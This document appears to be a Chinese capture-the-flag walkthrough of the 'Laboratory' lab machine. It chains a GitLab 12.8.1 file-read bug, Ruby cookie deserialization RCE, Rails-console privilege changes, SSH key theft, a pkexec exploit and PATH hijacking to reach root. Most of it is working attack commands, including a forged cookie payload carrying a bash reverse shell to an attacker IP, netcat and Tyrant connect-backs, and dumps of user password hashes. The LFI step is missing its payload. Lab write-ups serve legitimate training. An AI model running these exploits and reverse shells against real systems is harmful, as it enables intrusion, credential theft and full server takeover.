[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限提升+路径劫持
字数 1304 2025-08-29 08:30:30
GitLab v12.8.1 渗透测试全流程教学文档
1. 信息收集阶段
1.1 目标识别
- 目标IP: 10.10.10.216
- 开放端口:
- 22 (SSH)
- 80 (HTTP)
- 443 (HTTPS)
1.2 主机发现与端口扫描
使用以下命令进行扫描:
ip='10.10.10.216'; itf='tun0'
if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
if [ -n "$ports" ]; then
echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
nmap -Pn -sV -sC -p "$ports" "$ip"
else
echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
fi
else
echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
fi
1.3 服务识别
- SSH: OpenSSH 8.2p1 Ubuntu 4ubuntu0.1
- HTTP: Apache httpd 2.4.41
- HTTPS: Apache httpd 2.4.41 with SSL证书
- 证书信息:
- CommonName: laboratory.htb
- Subject Alternative Name: DNS:git.laboratory.htb
- 有效期: 2020-07-05 至 2024-03-03
- 证书信息:
2. 初始访问
2.1 添加主机记录
echo '10.10.10.216 laboratory.htb git.laboratory.htb' >> /etc/hosts
2.2 访问Web服务
- 主站点: https://laboratory.htb/
- GitLab站点: https://git.laboratory.htb/users/sign_in
2.3 注册用户
在GitLab站点注册一个新用户并登录
3. GitLab v12.8.1 LFI漏洞利用
3.1 创建项目
- 创建两个项目: A和B
- 在项目A的issues中添加以下内容:
- 将此issue移动到项目B中
3.2 漏洞原理
利用GitLab v12.8.1的文件上传路径处理不当漏洞,通过精心构造的路径实现本地文件包含(LFI)
4. Ruby反序列化RCE
4.1 准备GitLab环境
wget https://packages.gitlab.com/gitlab/gitlab-ce/packages/ubuntu/xenial/gitlab-ce_12.8.1-ce.0_amd64.deb
gitlab-ctl reconfigure
gitlab-ctl restart
4.2 生成恶意cookie
gitlab-rails console
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
erb = ERB.new("<%= bash -c 'bash -i>& /dev/tcp/10.10.16.31/10032 0>&1' %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb,:result, "@result", ActiveSupport::Deprecation.new)
cookies = request.cookie_jar
cookies.signed[:cookie] = depr
puts cookies[:cookie]
4.3 触发RCE
curl -vvv 'https://git.laboratory.htb/users/sign_in' -k -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kidCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBiYXNoIC1jICdiYXNoIC1pPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjIvNDQ0NCAwPiYxJ2AgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ=- -8fdb57c5b65cef79b38c842cc0a42570ff756636"
5. 横向移动
5.1 提升权限为管理员
gitlab-rails console
users = User.all
users.each do |user|
puts "ID: #{user.id}, Username: #{user.username}, Email: #{user.email}, Encrypted Password: #{user.encrypted_password}"
end
user = User.find_by(username: 'map')
user.admin = true
user.save!
5.2 访问敏感数据
- 浏览项目: https://git.laboratory.htb/explore
- 获取SSH私钥: https://git.laboratory.htb/dexter/securedocker/-/blob/master/dexter/.ssh/id_rsa
5.3 获取user flag
9c2a8cd5962ffcbf1f56cd3ec5e6fde8
6. 权限提升(TRP00F)
6.1 使用TRP00F工具
python3 trp00f.py --lhost 10.10.16.25 --lport 10000 --rhost 10.10.16.25 --rport 10032 --http 9999
选择利用pkexec漏洞(y)
6.2 路径劫持
- 监听端口:
nc 10.10.16.31 10011 </usr/local/bin/docker-security
- 创建恶意chmod脚本:
echo '#!/bin/bash\n/bin/bash' > /tmp/chmod
export PATH=/tmp:$PATH
- 执行docker-security触发路径劫持
6.3 使用Tyrant进行持久化
- 上传Tyrant工具
- 设置环境:
echo '/tmp/tyrant'>/tmp/chmod
/usr/bin/chmod +x chmod
/usr/bin/chmod +x tyrant
export PATH=/tmp:$PATH
/usr/local/bin/docker-security
- 获取root shell:
./tyrant -uid 0 -rhost 10.10.16.31 -rport 4451
6.4 获取root flag
07456541386c4c220bac22b424b00f3b
7. 技术要点总结
-
LFI漏洞利用:
- 利用GitLab文件上传路径处理不当
- 通过移动issue触发漏洞
-
Ruby反序列化RCE:
- 利用ActionDispatch::Request和ActiveSupport::Deprecation组件
- 通过恶意cookie触发反序列化
-
横向移动技术:
- 通过GitLab Rails控制台修改用户权限
- 访问内部项目获取敏感信息
-
权限提升技术:
- TRP00F工具利用pkexec漏洞
- 路径劫持技术
- 使用Tyrant进行持久化控制
-
防御规避:
- 使用环境变量PATH劫持
- 通过合法二进制文件执行恶意代码